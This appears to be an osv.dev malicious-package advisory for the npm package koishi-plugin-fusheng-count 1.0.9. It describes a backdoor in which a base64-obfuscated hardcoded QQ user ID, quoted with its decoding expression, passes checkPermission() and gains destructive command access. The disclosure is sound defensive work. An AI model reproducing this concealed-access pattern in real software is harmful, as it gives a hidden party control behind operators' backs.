koishi-plugin-fusheng-count @1.0.9
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-4595
Ecosystem
npm
Summary
lib/index.js contains a base64-obfuscated hardcoded user ID ( Buffer.from("Mjc1OTcyMDE2MQ==", "base64").toString("utf-8") decoding to QQ ID 2759720161 ) which is checked inside checkPermission(). When session.userId matches this hidden ID, the function returns { allowed: true } unconditionally, bypassing the plugin's documented allowedGroups whitelist and admin/owner role gating. The backdoor is undocumented in the README, and base64-encoding the ID demonstrates intent to conceal the identity from operators reading the source. Any deployment of this plugin grants the hardcoded account privileged command access (including destructive operations like 清空统计 which wipes all mention statistics) in every group the bot joins.
Source: amazon-inspector (060196a35f8eb94f7e91f892daf62aee8e293d16130565dfbc837877df264db5)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.